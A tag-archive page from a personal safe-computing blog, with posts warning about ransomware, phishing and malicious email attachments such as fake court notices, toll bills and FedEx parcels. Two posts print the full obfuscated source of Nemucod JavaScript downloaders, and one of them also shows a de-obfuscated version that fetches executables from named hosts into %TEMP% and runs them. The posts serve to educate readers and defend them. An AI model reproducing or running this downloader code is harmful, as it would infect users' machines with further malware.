Tag Archives: Safe computing

Here’s why you do external backups

Posted on by The Old Wolf

ransomware

The BotNet distributing the original Cryptolocker was taken down (I’ve mentioned this malware multiple times), and many people were able to get their data back – but there are still many malicious clones of this supremely evil malware floating around out there.

Per this article (in Norwegian, but you can use Google Translate to get a good gist of its meaning in English), if your files have been encrypted, you’re pretty well screwed. Your only options are to pay the ransom (which does not guarantee that you will get a decryption key) or bring your files back from a non-connected, external backup – this because the encrypting malware can affect cloud storage as well either directly or indirectly.

To protect yourself from this sort of data horror:

  1. Back up your files to an unconnected external drive regularly
  2. Never open email attachments from unknown people, no matter how legitimate they may look

Hell is going to be a busy place. Be careful out there.

The Old Wolf has spoken.

An Illustration: Why you never open those attachments.

Posted on by The Old Wolf

noattachments

I got two emails yesterday, each with an attachment. Both are designed to get people to open whatever malware package they are carrying:

To: [redacted]
Subject: Notice to appear in Court #00000554562

From: “District Court” <nathaniel.berger@realestate-philippines.net>

Notice to Appear,

This is to inform you to appear in the Court on the July 06 for your case hearing.
Please, do not forget to bring all the documents related to the case.
Note: The case will be heard by the judge in your absence if you do not come.
The copy of Court Notice is attached to this email.
Kind regards,
Nathaniel Berger,
Clerk of Court.
Attached: 00000554562.zip
Subject: Indebtedness for driving on toll road #0000133433
To: [redacted]

From: “E-ZPass Manager” <calvin.gleason@adescbrasil.com.br>
Notice to Appear,
You have a unpaid bill for using toll road.
Please, do not forget to service your debt.
You can review the invoice in the attachment.
Sincerely,
Calvin Gleason,
E-ZPass Agent.
E-ZPass_0000133433.zip

Notice that the second email begins the same way: “Notice to appear,” even though it’s a notification of a supposed debt. These were clearly cut/pasted by the same person/group.

So let’s look at that attachment.

The E-Z Pass zip file contains a file called “E-ZPass_0000133433.doc.js.” This is a javascript file, and it was immediately quarantined by Microsoft Security Essentials and flagged as TrojanDownloader:JS/Nemucod.P. According to Microsoft, “This program displays deceptive program messages. It downloads and installs other programs onto your PC without your consent, including other malware.”

Clearly, you don’t want to mess with this on your machine. The body of the file looks like this:

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;function igs118() { return ‘4 && ‘; };  function igs236() { return ‘);’; };  function igs101() { return ‘); x’; };  function igs193() { return ‘ x’; };  function igs232() { return ‘3862’; };  function igs3() { return ‘ dl’; };  function igs30() { return ‘i=’; };  function igs140() { return ‘a.ty’; };  function igs182() { return ‘} ‘; };  function igs74() { return ‘.rou’; };  function igs162() { return ‘1; x’; };  function igs23() { return ‘com”‘; };  function igs131() { return ‘ect(‘; };  function igs217() { return ‘ } c’; };  function igs228() { return ‘; dl(‘; };  function igs176() { return ‘{ ws’; };  function igs136() { return ‘”); x’; };  function igs141() { return ‘pe ‘; };  function igs97() { return ‘SXML2’; };  function igs192() { return ‘try {‘; };  function igs63() { return ‘(“‘; };  function igs50() { return ‘”);’; };  function igs229() { return ‘6001)’; };  function igs89() { return ‘ar x’; };  function igs66() { return ‘”)+’; };  function igs46() { return ‘WS’; };  function igs19() { return ‘ a’; };  function igs79() { return ‘m()*’; };  function igs186() { return ‘; };’; };  function igs28() { return ‘ (v’; };  function igs29() { return ‘ar ‘; };  function igs117() { return ‘e == ‘; };  function igs216() { return ‘nd();’; };  function igs185() { return ‘r) {}’; };  function igs113() { return ‘ (x’; };  function igs90() { return ‘o ‘; };  function igs72() { return ‘)+’; };  function igs70() { return ‘arCod’; };  function igs49() { return ‘ell’; };  function igs233() { return ‘); d’; };  function igs171() { return ‘ile(‘; };  function igs201() { return ‘]+”/d’; };  function igs166() { return ‘ 0; x’; };  var ci = ”;  function igs127() { return ‘ new ‘; };  function igs40() { return ‘s =’; };  function igs219() { return ‘h ‘; };  function igs206() { return ‘nd=”+’; };  function igs61() { return ‘rin’; };  function igs22() { return ‘ge.’; };  function igs102() { return ‘o.o’; };  function igs138() { return ‘pen’; };  function igs14() { return ‘cl’; };  function igs111() { return ‘n()’; };  function igs10() { return ‘so’; };  function igs48() { return ‘.Sh’; };  function igs51() { return ‘ v’; };  function igs98() { return ‘.XMLH’; };  function igs167() { return ‘a.’; };  function igs17() { return ‘etqy’; };  function igs42() { return ‘Ac’; };  function igs194() { return ‘o.’; };  function igs129() { return ‘eX’; };  function igs137() { return ‘a.o’; };  function igs91() { return ‘= ‘; };  function igs144() { return ‘a.’; };  function igs159() { return ‘ { d’; };  function igs45() { return ‘t(“‘; };  function igs2() { return ‘ion’; };  function igs92() { return ‘new’; };  function igs18() { return ‘.com’; };  function igs106() { return ‘atec’; };  function igs8() { return ‘”dick’; };  function igs65() { return ‘P%’; };  function igs147() { return ‘e(xo’; };  function igs68() { return ‘g.f’; };  function igs75() { return ‘nd’; };  function igs24() { return ‘.spli’; };  function igs200() { return ‘”+b[i’; };  function igs47() { return ‘cript’; };  function igs227() { return ‘ } }’; };  function igs179() { return ‘n,’; };  function igs161() { return ‘= ‘; };  function igs187() { return ‘ xa’; };  function igs67() { return ‘Strin’; };  function igs34() { return ‘leng’; };  function igs27() { return ‘for’; };  function igs143() { return ‘; x’; };  function igs199() { return ‘tp://’; };  function igs35() { return ‘th; ‘; };  function igs177() { return ‘.R’; };  function igs39() { return ‘ w’; };  function igs4() { return ‘(fr’; };  function igs153() { return ‘f (‘; };  function igs189() { return ‘ose(‘; };  function igs115() { return ‘ead’; };  function igs33() { return ‘b.’; };  function igs1() { return ‘funct’; };  function igs146() { return ‘it’; };  function igs44() { return ‘Objec’; };  function igs145() { return ‘wr’; };  function igs38() { return ‘ var’; };  function igs11() { return ‘nw’; };  function igs108() { return ‘e ‘; };  function igs94() { return ‘ve’; };  function igs205() { return ‘p?r’; };  function igs169() { return ‘veT’; };  function igs174() { return ‘); tr’; };  function igs16() { return ‘om ‘; };  function igs105() { return ‘dyst’; };  function igs170() { return ‘oF’; };  function igs83() { return ‘)+”.e’; };  function igs230() { return ‘; d’; };  function igs78() { return ‘rando’; };  function igs149() { return ‘spo’; };  function igs21() { return ‘na’; };  function igs37() { return ‘+) {‘; };  function igs203() { return ‘ume’; };  function igs125() { return ‘ xa’; };  function igs76() { return ‘(Ma’; };  function igs41() { return ‘ new ‘; };  function igs188() { return ‘.cl’; };  function igs134() { return ‘.St’; };  function igs80() { return ‘10000’; };  function igs116() { return ‘yStat’; };  function igs150() { return ‘ns’; };  function igs135() { return ‘ream’; };  function igs114() { return ‘o.r’; };  function igs96() { return ‘ct(“M’; };  function zuw() { return ‘e’; };  function igs215() { return ‘.se’; };  function igs139() { return ‘(); x’; };  function igs62() { return ‘gs’; };  function igs130() { return ‘Obj’; };  function igs222() { return ‘; if ‘; };  function igs218() { return ‘atc’; };  function igs133() { return ‘ODB’; };  function igs207() { return ‘fr+”&’; };  function igs123() { return ‘200) ‘; };  function igs202() { return ‘oc’; };  function igs6() { return ‘var ‘; };  function igs152() { return ‘); i’; };  function igs198() { return ‘”,”ht’; };  function igs148() { return ‘.Re’; };  function igs221() { return ‘) {}’; };  function igs25() { return ‘t(” “‘; };  function igs234() { return ‘l(‘; };  function igs100() { return ‘P”‘; };  function igs209() { return ‘=”+s’; };  function igs165() { return ‘ion =’; };  function igs204() { return ‘nt.ph’; };  function igs104() { return ‘ea’; };  function igs55() { return ‘.Expa’; };  function igs112() { return ‘ { if’; };  function igs99() { return ‘TT’; };  function igs5() { return ‘) { ‘; };  function igs12() { return ‘res’; };  function igs178() { return ‘un(f’; };  function igs87() { return ‘ = ‘; };  function igs195() { return ‘op’; };  function igs85() { return ‘; v’; };  function igs214() { return ‘ xo’; };  function igs224() { return ‘ == 1’; };  function igs226() { return ‘reak;’; };  function igs223() { return ‘(dn’; };  function igs124() { return ‘{ var’; };  function igs196() { return ‘en(“G’; };  function igs95() { return ‘XObje’; };  function igs31() { return ‘0; ‘; };  function igs15() { return ‘ub.c’; };  function igs126() { return ‘ =’; };  function igs54() { return ‘ ws’; };  function igs73() { return ‘Math’; };  function igs82() { return ’00’; };  function igs231() { return ‘l(‘; };  function igs119() { return ‘xo.s’; };  function igs107() { return ‘hang’; };  function igs86() { return ‘ar dn’; };  function igs190() { return ‘); }’; };  function igs155() { return ‘.si’; };  function igs213() { return ‘e);’; };  function igs58() { return ‘onm’; };  function igs7() { return ‘b = ‘; };  function igs208() { return ‘id’; };  function igs120() { return ‘ta’; };  function igs121() { return ‘tu’; };  function igs88() { return ‘0; v’; };  function igs71() { return ‘e(92’; };  function igs84() { return ‘xe”‘; };  function igs36() { return ‘i+’; };  function igs122() { return ‘s == ‘; };  function igs109() { return ‘= fu’; };  function igs69() { return ‘romCh’; };  function igs56() { return ‘ndEnv’; };  function igs64() { return ‘%TEM’; };  function igs212() { return ‘als’; };  function igs110() { return ‘nctio’; };  function igs103() { return ‘nr’; };  function igs164() { return ‘posit’; };  function igs173() { return ‘,2’; };  function igs225() { return ‘) b’; };  function igs53() { return ‘fn =’; };  function igs157() { return ‘> 500’; };  function igs151() { return ‘eBody’; };  function igs175() { return ‘y ‘; };  function igs9() { return ‘in’; };  function igs13() { return ‘tling’; };  function igs154() { return ‘xa’; };  function igs32() { return ‘i<‘; };  function igs59() { return ‘ent’; };  function igs172() { return ‘fn’; };  function igs() { return ‘val’; };  function igs142() { return ‘= 1′; };  function igs81() { return ’00’; };  function igs180() { return ‘1,’; };  function igs57() { return ‘ir’; };  function igs43() { return ‘tiveX’; };  function igs60() { return ‘St’; };  function igs160() { return ‘n ‘; };  function igs191() { return ‘; }; ‘; };  function igs183() { return ‘catch’; };  function igs77() { return ‘th.’; };  function igs52() { return ‘ar ‘; };  function igs235() { return ‘8083’; };  function igs163() { return ‘a.’; };  function igs181() { return ‘0); ‘; };  function igs132() { return ‘”AD’; };  function igs156() { return ‘ze ‘; };  function igs197() { return ‘ET’; };  function igs128() { return ‘Activ’; };  function igs20() { return ‘volo’; };  function igs211() { return ‘, f’; };  function igs93() { return ‘ Acti’; };  function igs168() { return ‘sa’; };  function igs158() { return ‘0)’; };  function igs26() { return ‘); ‘; };  function igs210() { return ‘troke’; };  function igs184() { return ‘ (e’; };  function igs220() { return ‘(er’; }; for (var pn=1; pn<=236; pn++) { ci += this[‘igs’+pn](); } this[zuw()+igs()](ci);

The last statement in the program concatenates all these little scraps of code (listed out of order) into one large statement and then executes it:

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;
{ return valfunction dl(fr) { var b = “dickinsonwrestlingclub.com etqy.com avolonage.com”.split(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shell”); var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; x; }; var ci = ;
a.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; } }; dl(6001); dl(3862); dl(8083);zuwe
for (var pn=1; pn<=236; pn++) { ci += this[‘igs’+pn](); } this[zuw()+igs()](ci);

Now I’m not a Javascript coder, but I can tell just by looking at it that this will access several compromised or outright malicious websites out there, and then download and run other files which are guaranteed to make your life miserable. At the least, you’ll get advertisements and popups. At worst, you will lose all your data in horrible ways or become part of a spamming network of zombie computers, or have your identity and your financial information stolen and used by criminals. None of these things are appealing.

To protect yourself, these two rules should be followed at all times:

  1. Do not click on links. Instead, copy the URL from the email and paste it into your browser. Even better is to simply type the destination name into your browser.
  2. Be suspicious of attachments, and only open those that you are expecting.

There are others, but if everyone would follow these two basic common-sense procedures, the bad actors would have far less access to people’s machines and data.

Protect your loved ones, and be careful out there.

The Old Wolf has spoken.

Protect yourself from Phishing attacks

Posted on by The Old Wolf

nophishing

Great advice from a local business:

  • Be suspicious of any email that requires “immediate action” or creates a sense of urgency. This is a common technique used by criminals to rush people into making a mistake.
  • Be suspicious of emails addressed to “Dear Customer” or some other generic salutation. If it is your bank, they will know your name.
  • Be suspicious of grammar or spelling mistakes; most businesses proofread their messages carefully before sending them.
  • Do not click on links. Instead, copy the URL from the email and paste it into your browser. Even better is to simply type the destination name into your browser.
  • Hover your mouse over the link. This will show you the true destination where you would go if you actually clicked on it. If the true destination of the link is different than what is shown in the email, this may be an indication of fraud.
  • Be suspicious of attachments, and only open those that you are expecting.
  • Just because you got an email from your friend does not mean they sent it. Your friend’s computer may have been infected or their account may have been compromised, and malware is sending the email to all of your friend’s contacts.
  • If you get a suspicious email from a trusted friend or colleague, call them to confirm that they sent it. Always use a telephone number that you already know or can independently verify, not one that was included in the message.

I’ve mentioned most of these in various other posts, but this was an excellent summary that deserved to be shared. Be careful out there.

The Old Wolf has spoken.

An .EXE file is not an invoice

Posted on by The Old Wolf

Chapa NO MALWARE

Today’s scam email:

From: “Agnessa Arina” <agnessaarina@yahoo.es>
To: redacted
Subject: FW::deposit invoice copy

Hi,

we are updating our company email address so i’m sending you the outstanding balance and new lodging.

Confirm receipt.

Amy chan

Tridium, Inc.
3951 Westerre Parkway, Suite 350
Richmond, VA 23233
USA.

View Download

That “Download” is a file called “deposit copy.exe” – something you NEVER want to click on. EXE files are PROGRAMS, and they are BAD NEWS. From code that will log your keystrokes, steal your information, turn your machine into a zombie spamming device, to encrypting all your files for ransom, these malware programs will make your life a living hell. Just don’t do it.

The Old Wolf has spoken.

Again: Don’t click on email attachments from unknown people.

Posted on by The Old Wolf

This cannot be stressed enough: Don’t click on email attachments from unknown people.

Edit: Friends have pointed out that it’s best to be wary of attachments appearing to be from people you know, if you aren’t expecting one. Contact lists can be stolen and people impersonated.

pc-trojan

Yesterday this email showed up in my inbox:

To: [edited]
Subject: We could not deliver your parcel, #00576180
From: “FedEx International Ground” <allan.horton@web2.pnet.xcon.it>

Dear Customer,

This is to confirm that one or more of your parcels has been shipped.
Delivery Label is attached to this email.

Sincerely,
Allan Horton,
Operation Agent.
(C) 2014 FedEx. The content of this message is protected by copyright and trademark laws. All rights reserved.

Attached to the email was a file called “FedEx_ID_00576180.zip.”

Curious as ever, in an isolated environment I unpacked the zip file, and the result was immediately flagged and quarantined by Microsoft Security Essentials as containing the file “FedEx_ID_00576180.doc.js,” which contained “TrojanDownloader:JS/Nemucod.F

What that means is that this is a javascript file containing executable code which would go out to the internet and download horrible things onto your computer – adware, keyloggers, botnet software, or even never-sufficiently-to-be-damned ransomware like Cryptolocker which could encrypt all your files and demand hundreds of dollars for a decryption key.

When I examined the file contents, it looked like this:

function hhhhhhhhhhhhhhh(){ccccc += ‘+”‘; jjjjjjjjjjjjjjj(); };  function iiiiiiiiiiiiiiii(){ccccc += ‘ction’; tttttttttttttt(); };  function ggggggggggggggg(){ccccc += ‘e();’; xxxxxxxxx(); };  function fffffff(){ccccc += ‘= w’; llllll(); };  function yyyyyyyyyyyyyyyy(){ccccc += ‘new ‘; wwwwwwwwwwwwwwww(); };  function gggggggggggggggg(){ccccc += ‘(“WS’; qqqqqqqqqqqqq(); };  function zzzzzzzzzzzz(){ccccc += ‘t.php’; llllllllllllll(); };…

In other words, it looked like garbage. Refuse. Filth. Muck. Boo! Boo! Booooooo! But when I massaged the file a little, putting each “function” call on a new line, this is what came out:

function hhhhhhhhhhhhhhh(){ccccc += ‘+”‘; jjjjjjjjjjjjjjj(); };
function iiiiiiiiiiiiiiii(){ccccc += ‘ction’; tttttttttttttt(); };
function ggggggggggggggg(){ccccc += ‘e();’; xxxxxxxxx(); };
function fffffff(){ccccc += ‘= w’; llllll(); };
function yyyyyyyyyyyyyyyy(){ccccc += ‘new ‘; wwwwwwwwwwwwwwww(); };
function gggggggggggggggg(){ccccc += ‘(“WS’; qqqqqqqqqqqqq(); };
function zzzzzzzzzzzz(){ccccc += ‘t.php’; llllllllllllll(); };
function jjjjjjjj(){ccccc += ‘dys’; zzzzzzzz(); };
function pppppppppp(){ccccc += ‘dl(51’; llllllll(); };
function xxxxxxxxxxxx(){ccccc += ‘ xa’; hhhhhhhhhhhhhh(); };
function ssssssssssss(){xx += ‘a’; ccccc += ‘n ‘; gggggggggg(); };
function wwwwwwwwwww(){ccccc += ‘de(92’; ssssssssssssssss(); };
function bbbbbbbbb(){ccccc += ‘bluee’; jjjjjjjjj(); };
function qqqqqqqqqqqqqq(){ccccc += ’00’; iiiiiiiiii(); };
function eeeeeeeee(){ccccc += ‘iv’; wwwwwwww(); };
function eeeeeeeeee(){ccccc += ‘ySt’; ggggggg(); };
function vvvvvvvvvvvvvv(){ccccc += ‘o.sta’; wwwwwww(); };
function pppppppppppppppp(){ccccc += ‘; ‘; aaaaaaaaaaaaa(); };
function ddddddddddddddd(){ccccc += ‘) ‘; ppppppp(); };
function dddddddddd(){ccccc += ‘ct’; ssssssssssssss(); };
function pppppp(){ccccc += ‘arCo’; wwwwwwwwwww(); };
function xxxxxxxxxxxxxx(){ccccc += ‘ze’; aaaaaaaaaa(); };
function iiiiiii(){ccccc += ‘ength’; gggggggggggg(); };
function yyyyyy(){ccccc += ‘r xo ‘; cccccccc(); };
function pppppppppppppp(){ccccc += ‘a.p’; mmmmmmm(); };
function uuuuuuuuuuu(){ccccc += ‘ariau’; iiiiiiiiiiiiiiii(); };
function ggggggggggg(){ccccc += ‘y)’; pppppppppppppppp(); };
function pppppppppppp(){ccccc += ‘E0707’; qqqqqqqqqqqqqq(); };
function nnnnnn(){ccccc += ‘.nidh’; nnnnnnnnnnnnnnnn(); };
function jjjjjjjjjjj(){ccccc += ‘0B’; eeeeeeeeeeeeeeee(); };
function fffffffffffffff(){ccccc += ‘ound’; hhhhhhhhhh(); };
function mmmmmmmmmmmmmm(){ccccc += ‘ry’; mmmmmmmm(); };
function lllllllllll(){ccccc += ‘ A’; dddddddddd(); };
function xxxxxxxxxx(){ccccc += ‘ }; ‘; ggggggggg(); };
function llllllllllllll(){ccccc += ‘?r’; ddddddddddd(); };
function ccccccccc(){ccccc += ‘A01’; oooooo(); };
function zzzzzzzzzzzzzzzz(){ccccc += ‘xe”; ‘; rrrrrrrrrrrr(); };
function ttttttttttttttt(){ccccc += ‘SXML2’; jjjjjjjjjjjj(); };
function xxxxxxxxxxxxx(){ccccc += ‘} cat’; ccccccccccccc(); };
function jjjjjjjjj(){ccccc += ‘cho’; hhhhhhh(); };
function qqqqqqqq(){ccccc += ‘ct’; nnnnnnnnnnnnnn(); };
function zzzzzzzzzzz(){ccccc += ‘050A2’; rrrrrrrr(); };
function vvvvvvvvvvvvv(){ccccc += ‘dn ‘; lllllllll(); };
function nnnnnnnn(){ccccc += ‘ } ‘; hhhhhhhhhhhhhhhh(); };
function aaaaaaaaaaaa(){ccccc += ‘xo.op’; kkkkkkkkkkk(); };
function sssssssssssss(){ccccc += ‘ (xa’; xxxxxxxx(); };
function hhhhhhhhhhh(){ccccc += ‘ xa.’; qqqqqqqqqqqqqqqq(); };
function wwwwwwww(){ccccc += ‘eX’; ddddddddddddd(); };
function kkkkkkk(){xx += ‘v’; ccccc += ‘tio’; ssssssssssss(); };
function uuuuuuuuuuuuuuuu(){ccccc += ‘eXObj’; bbbbbbbbbb(); };
function ggggggg(){ccccc += ‘ate’; zzzzzzzzzzzzz(); };
function ffffffffffffff(){ccccc += ‘”&id’; ddddddd(); };
function rrrrrrrr(){ccccc += ‘407’; jjjjjjjjjjj(); };
function vvvvvvvv(){ccccc += ‘.read’; eeeeeeeeee(); };
function zzzzzzzzz(){ccccc += ‘515’; pppppppppppp(); };
function sssssssssss(){ccccc += ‘ndom(‘; iiiiiiiiiiii(); };
function cccccccccccc(){ccccc += ‘ent’; bbbbbbbbbbbbbbbb(); };
function rrrrrrrrrr(){ccccc += ‘en()’; sssssss(); };
function iiiiiiiiiiii(){ccccc += ‘)*100’; dddddddddddd(); };
function kkkkkkkkkk(){ccccc += ‘ A’; qqqqqqqq(); };
function qqqqqqqqqqqq(){ccccc += ‘%TEMP’; aaaaaaaa(); };
function mmmmmmmmmmmmm(){ccccc += ‘ct(“M’; ttttttttttttttt(); };
function ccccccc(){ccccc += ‘”h’; rrrrrrrrrrrrrr(); };
function sssssssss(){ccccc += ‘= 1)’; xxxxxxxxxxxxxxx(); };
function cccccccccc(){ccccc += ‘e(xo’; bbbbbbbb(); };
function rrrrrrrrrrrrrrr(){ccccc += ‘ =’; ffffffffffff(); };
function rrrrrrrrrrrr(){ccccc += ‘var’; lllllllllllll(); };
function xxxxxxxx(){ccccc += ‘.si’; xxxxxxxxxxxxxx(); };
function ggggggggggggg(){ccccc += ‘104A0’; ccccccccc(); };
function mmmmmmmmmm(){ccccc += ‘= 1; ‘; kkkkkkkkkkkkk(); };
function bbbbbbbbbbbbbbb(){ccccc += ‘ b’; rrrrrrrrrrrrrrr(); };
function wwwwwww(){ccccc += ‘tu’; tttttttttttt(); };
function sssssss(){ccccc += ‘; xa.’; uuuuuu(); };
function lllllllll(){ccccc += ‘= 1;’; qqqqqqqqqq(); };
function llllll(){ccccc += ‘s.’; ttttttttttt(); };
function rrrrrrrrrrrrrrrr(){ccccc += ‘ar ‘; ssssss(); };
function uuuuuuuuuuuuuuu(){ccccc += ‘ngs’; nnnnnnn(); };
function gggggggggggg(){ccccc += ‘; ‘; lllllll(); };
function fffffffff(){ccccc += ‘r+’; ffffffffffffff(); };
function jjjjjjjjjjjjjjj(){ccccc += ‘.e’; zzzzzzzzzzzzzzzz(); };
function dddddd(){ccccc += ‘ech’; qqqqqq(); };
function eeeeeeee(){ccccc += ‘&& x’; vvvvvvvvvvvvvv(); };
function uuuuuuuu(){xx += ‘e’; ccccc += ‘func’; kkkkkkk(); };
function aaaaaaaaaaaaaa(){ccccc += ‘[i]’; uuuuuuuuuuuuuu(); };
function qqqqqqqqqqqqqqq(){ccccc += ‘o.sen’; wwwwwwwwwwwwww(); };
function ssssssssss(){ccccc += ‘; for’; llllllllllllllll(); };
function lllllllllllll(){ccccc += ‘ dn ‘; dddddddddddddd(); };
function aaaaaaaaaaaaaaa(){ccccc += ‘.Ru’; ccccccccccccccc(); };
function ppppppp(){ccccc += ‘{ va’; qqqqqqqqq(); };
function rrrrrrrrr(){ccccc += ‘r ws ‘; llllllllllll(); };
function bbbbbbbb(){ccccc += ‘.Resp’; mmmmmmmmm(); };
function jjjjjjjjjjjjjj(){ccccc += ‘pt.S’; aaaaaaaaaaaaaaaa(); };
function cccccccccccccc(){ccccc += ‘000’; uuuuuuuuuuuuu(); };
function cccccccccccccccc(){ccccc += ‘it’; bbbbbbbbbbbbb(); };
function xxxxxx(){ccccc += ‘);’; bbbbbbbbbbbb(); };
function ssssss(){ccccc += ‘i=0;’; yyyyyyyyyyyyy(); };
function yyyyyyyyyyyyyyy() { this[xx](ccccc); };
function llllllllllllllll(){ccccc += ‘ (v’; rrrrrrrrrrrrrrrr(); };
function iiiiii(){ccccc += ‘)+S’; hhhhhh(); };
function eeeeeeeeeeee(){ccccc += ‘od’; ggggggggggg(); };
function ccccccccccc(){ccccc += ‘h.r’; fffffffffffffff(); };
function zzzzzz(){ccccc += ‘}; ‘; llllllllll(); };
function aaaaaaaaaaaaaaaa(){ccccc += ‘hell’; pppppppp(); };
function gggggggg(){ccccc += ‘0;’; bbbbbbbbbbbbbb(); };
function hhhhhhhh(){ccccc += ‘B.S’; bbbbbbb(); };
function pppppppp(){ccccc += ‘”); v’; kkkkkkkkkkkkkk(); };
function wwwwwwwwwwwww(){ccccc += ‘nd’; jjjjjjjjjj(); };
function iiiiiiiiii(){ccccc += ’01’; sssssssssssssss(); };
function gggggggggg(){xx += ‘l’; ccccc += ‘dl(fr’; kkkkkkkk(); };
function nnnnnnn(){ccccc += ‘(“‘; qqqqqqqqqqqq(); };
function vvvvvvvvvvvvvvv(){ccccc += ‘oF’; yyyyyyyyy(); };
function iiiiiiii(){ccccc += ‘.f’; ttttttttttttt(); };
function jjjjjj(){ccccc += ‘} }; ‘; pppppppppp(); };
function wwwwwwwwww(){ccccc += ‘om”‘; jjjjjjjjjjjjjjjj(); };
function mmmmmmmm(){ccccc += ‘ { ws’; aaaaaaaaaaaaaaa(); };
function oooooooooooooo(){ccccc += ‘m”);’; hhhhhhhhhhh(); };
function ggggggggg(){ccccc += ‘try’; iiiiiiiiiii(); };
function vvvvvvvvv(){ccccc += ‘en’; zzzzzzzzzzzz(); };
function hhhhhh(){ccccc += ‘tring’; iiiiiiii(); };
function mmmmmmm(){ccccc += ‘ositi’; ttttttttt(); };
function eeeeeeeeeeeeeee(){ccccc += ‘ct’; gggggggggggggggg(); };
function qqqqqqqqqqqqqqqq(){ccccc += ‘op’; rrrrrrrrrr(); };
function ttttttttttttt(){ccccc += ‘ro’; ppppppppppp(); };
function nnnnnnnnn(){ccccc += ‘/”+b’; aaaaaaaaaaaaaa(); };
function hhhhhhh(){ccccc += ‘stud’; yyyyyyyyyyyyyy(); };
function eeeeeeeeeeeeee(){ccccc += ‘; ‘; jjjjjj(); };
function tttttttt(){ccccc += ‘reak’; eeeeeeeeeeeeee(); };
function jjjjjjjjjjjjj(){ccccc += ‘ (dn’; aaaaaaa(); };
function eeeeee(){ccccc += ‘a = n’; iiiiiiiiiiiiiii(); };
function vvvvvvvvvvvv(){ccccc += ‘};’; xxxxxxxxxxxx(); };
function zzzzzzz(){ccccc += ‘”AD’; ddddddddd(); };
function zzzzzzzzzz(){ccccc += ‘n ‘; fffffff(); };
function aaaaaaaa(){ccccc += ‘%”‘; iiiiii(); };
function hhhhhhhhhhhhhh(){ccccc += ‘.clos’; ggggggggggggggg(); };
function yyyyyyyyyyyyy(){ccccc += ‘ i’; fffffffffffff(); };
function eeeeeeeeeeeee(){ccccc += ‘f (xo’; vvvvvvvv(); };
function uuuuuuuuu(){ccccc += ‘ { i’; eeeeeeeeeeeee(); };
function qqqqqqqqqq(){ccccc += ‘ x’; pppppppppppppp(); };
function oooooooooo(){ccccc += ‘je’; mmmmmmmmmmmmm(); };
function iiiiiiiiiii(){ccccc += ‘ { ‘; aaaaaaaaaaaa(); };
function nnnnnnnnnn(){ccccc += ‘dl(20′; ffffffffff(); };
function aaaaaaaaa(){ccccc += ’00)’; hhhhhhhhhhhhhhh(); };
function hhhhhhhhhhhhhhhh(){ccccc += ‘catc’; ssssssss(); };
function kkkkkkkkk(){ccccc += ‘fn,1’; kkkkkk(); };
function nnnnnnnnnnnnnnnn(){ccccc += ‘og’; nnnnnnnnnnnnn(); };
function ffffff(){ccccc += ‘TTP”‘; xxxxxx(); };
function ooooooooooo(){ccccc += ‘lit’; hhhhhhhhh(); };
function mmmmmm(){ccccc += ‘= 0; ‘; iiiiiiiiiiiii(); };
function nnnnnnnnnnnnnn(){ccccc += ‘iv’; uuuuuuuuuuuuuuuu(); };
function bbbbbbbbbb(){ccccc += ‘ect(‘; zzzzzzz(); };
function hhhhhhhhhh(){ccccc += ‘(Ma’; xxxxxxxxxxxxxxxx(); };
function ssssssss(){ccccc += ‘h (e’; ppppppppp(); };
function nnnnnnnnnnnnn(){ccccc += ‘.com ‘; bbbbbbbbb(); };
function kkkkkkkkkkkkk(){ccccc += ‘xa.wr’; mmmmmmmmmmmm(); };
function oooooo(){ccccc += ’10″‘; rrrrrrr(); };
function aaaaaaa(){ccccc += ‘ =’; sssssssss(); };
function ssssssssssssssss(){ccccc += ‘)+Mat’; ccccccccccc(); };
function kkkkkkkkkkkkkkk(){ccccc += ‘.c’; wwwwwwwwww(); };
function ddddddddd(){ccccc += ‘OD’; hhhhhhhh(); };
function iiiiiiiii(){ccccc += ‘”+f’; fffffffff(); };
function eeeeeeeeeeeeeeee(){ccccc += ‘09070’; hhhhhhhhhhhh(); };
function xxxxxxxxxxxxxxx(){ccccc += ‘ b’; tttttttt(); };
function yyyyyyyy(){ccccc += ‘n,2)’; ffffffffffffffff(); };
function mmmmmmmmmmmm(){ccccc += ‘it’; cccccccccc(); };
function bbbbbbbbbbbb(){ccccc += ‘ xo.o’; wwwwwwwww(); };
function llllllll(){ccccc += ’41’; vvvvvv(); };
function vvvvvvvvvvv(){ccccc += ‘ri’; uuuuuuuuuuuuuuu(); };
function zzzzzzzzzzzzz(){ccccc += ‘ ==’; aaaaaaaaaaa(); };
function hhhhhhhhhhhh(){ccccc += ‘517’; ggggggggggggg(); };
function tttttt(){ccccc += ‘r)’; ooooooo(); };
function ssssssssssssss(){ccccc += ‘ive’; dddddddddddddddd(); };
function fffffffffffff(){ccccc += ‘<b.l’; iiiiiii(); };
function qqqqqq(){ccccc += ‘ange ‘; nnnnnnnnnnnn(); };
function xxxxxxxxxxxxxxxx(){ccccc += ‘th.ra’; sssssssssss(); };
function qqqqqqqqqqqqq(){ccccc += ‘cri’; jjjjjjjjjjjjjj(); };
function ppppppppppp(){ccccc += ‘mCh’; pppppp(); };
function aaaaaaaaaa(){ccccc += ‘ > 5’; cccccccccccccc(); };
function ddddddd(){ccccc += ‘=545D’; zzzzzzzzz(); };
function jjjjjjjjjj(){ccccc += ‘Env’; yyyyyyyyyyy(); };
function aaaaaaaaaaaaa(){ccccc += ‘if’; sssssssssssss(); };
function iiiiiiiiiiiiiii(){ccccc += ‘ew’; kkkkkkkkkk(); };
function qqqqqqqqqqq(){ccccc += ‘; ‘; xxxxxxxxxxxxx(); };
function hhhhhhhhhhhhh(){ccccc += ‘lse)’; kkkkkkkkkkkk(); };
function nnnnnnnnnnnn(){ccccc += ‘= ‘; ooooooooooooo(); };
function dddddddddddddddd(){ccccc += ‘XObje’; eeeeeeeeeeeeeee(); };
function kkkkkkkk(){ccccc += ‘) { ‘; uuuuuuuuuu(); };
